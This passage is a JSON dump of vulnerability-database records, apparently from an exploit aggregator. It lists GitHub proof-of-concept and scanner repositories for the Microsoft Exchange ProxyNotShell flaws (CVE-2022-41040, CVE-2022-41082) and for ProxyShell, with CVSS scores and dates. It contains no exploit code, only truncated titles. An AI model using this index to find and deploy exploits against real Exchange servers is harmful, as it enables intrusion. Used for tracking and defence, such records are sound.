"NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:47:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-09T01:03:02", "id": "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T19:39:20", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T17:36:06", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-04T17:42:39", "id": "FE6D7F99-F6AF-559F-93A5-786367B77158", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:24:24", "description": "# CVE-2022-41040-metasploit-ProxyNotShell\nthe metasploit script(...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T03:11:03", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-09-16T21:57:28", "id": "0A2301E7-88D2-55E7-BB5D-7889B2D2ACFD", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-04T08:02:33", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T03:50:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-04T06:50:13", "id": "3410A018-A761-5411-8E58-892F756D299A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T23:02:22", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T22:16:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-06T22:37:49", "id": "CF3485E1-2E99-580B-BC50-D61EA587BA40", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:03:14", "description": "# -CVE-2022-41082-RCE\nPoC for CVE-2022-41082 RCE as known as Pro...", "cvss3": {}, "published": "2022-09-30T20:59:46", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:01:47", "id": "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-11-02T16:19:33", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T11:53:14", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-21T14:50:07", "id": "5D652B55-850E-5043-96F0-43DE64B98D34", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:45", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T04:54:38", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-03T05:11:55", "id": "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:02:00", "description": "# CVE-2022-41082\nCVE-2022-41082 is a SSRF vulnerability which le...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T05:57:11", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-03T05:57:48", "id": "6776EABD-28C1-5A42-8AB2-27BD7F492078", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:43:27", "description": "# vuln-CVE-2022-41082\nhttps & http\n\n\nFOR HTTP:\n\n`nm...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-22T20:04:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2023-03-22T20:11:03", "id": "03C7B86D-A112-52AC-86B9-25FC053C273B", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:13:25", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "4D11A641-A378-5AE3-8CCD-C45CFD453293", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T23:02:02", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T22:18:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-06T22:37:45", "id": "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:47", "description": "# CVE-2022-41082\nCVE-2022-41082 is a SSRF vulnerability which le...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-02T08:51:58", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-02T12:29:02", "id": "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-12T17:00:15", "description": "# CVE-2022-41082-RCE-POC\nPoC and writeup for CVE-2022-41082. is ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T13:52:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-12T11:33:53", "id": "5C16D945-0879-5E51-B2AF-B106F633656A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-01T15:53:13", "description": "# CVE-2022-41082-RCE\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-10-01T11:45:34", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-01T11:48:37", "id": "87179042-CF32-5495-87D0-B916B42259D2", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T11:05:04", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T08:18:55", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-06T08:27:11", "id": "17DBAF5D-D221-53A1-8663-721B510E680E", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:03:01", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {}, "published": "2022-09-30T18:25:21", "type": "githubexploit", "title": "Exploit for CVE-2022-41040", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-09-30T19:54:22", "id": "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:13:21", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "611C3255-B1A5-56E6-8D1D-FCC2CE570C29", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:02:18", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {}, "published": "2022-09-30T19:07:36", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T19:59:34", "id": "9905FF79-0EE2-5313-9486-DA71B70A3D88", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T08:05:17", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T03:59:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-04T06:50:06", "id": "2DFE744C-4369-56D5-9FEA-348B4150C298", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T11:07:53", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T08:22:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-06T08:26:55", "id": "0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T11:04:07", "description": "# CVE-2022-41082 RCE a.k.a ProxyNotShell \r\n\r\n## Attention!\r\n\r\nTh...", "cvss3": {}, "published": "2022-09-30T09:33:39", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T09:38:02", "id": "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-02T02:06:53", "description": "# CVE-2022-41082-POC\nPoC for CVE-2022-41082 RCE a.k.a ProxyNotSh...", "cvss3": {}, "published": "2022-10-01T05:30:48", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-01T11:42:51", "id": "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:03:05", "description": "# CVE-2022-41082-PoC\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-09-30T17:23:29", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T17:29:46", "id": "E4395A48-164E-527F-8B5B-1A44D3F379B6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:12:38", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "DF35E634-51B1-5A30-AB0B-8518E3754609", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:04:16", "description": "# CVE-2022-41082-RCE\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-09-30T12:48:08", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T19:04:38", "id": "04705DD0-6F67-5847-B368-4ADB734EC12B", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T19:38:53", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T17:32:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-04T17:42:32", "id": "031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:02:09", "description": "# CVE-2022-41082-POC\nPoC for CVE-2022-41082 RCE as known as Prox...", "cvss3": {}, "published": "2022-09-30T17:51:47", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:02:14", "id": "6064317C-299E-530F-81F1-F80C282AE68A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:28", "description": "# CVE-2021-34473-scanner\nScanner for CVE-2021-34473, ProxyShell,...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T12:20:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-12-22T09:48:36", "id": "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:09:52", "description": "# CVE-2021-34473\nCVE-2021-34473 Microsoft Exchange Server Remote...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T11:27:13", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2022-08-10T06:53:56", "id": "4AC49DB9-A784-561B-BF92-94209310B51B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T21:36:34", "description": "# CVE-2022-41040\nCode set relating to CVE-2022-41040.\n\nscanner.p...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T01:20:32", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-09T14:24:07", "id": "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:43:05", "description": "UPDATED VERSION ALLOWS FOR HTTPS CHECK AS WELL \n\n# exchange-vuln...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-14T08:31:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2023-02-17T00:50:04", "id": "32D96718-99E1-55BD-86E8-30A9B59E40D1", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:26:27", "description": "# CVE-2022-41040-POC\nCVE-2022-41040 - Server Side Request Forger...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 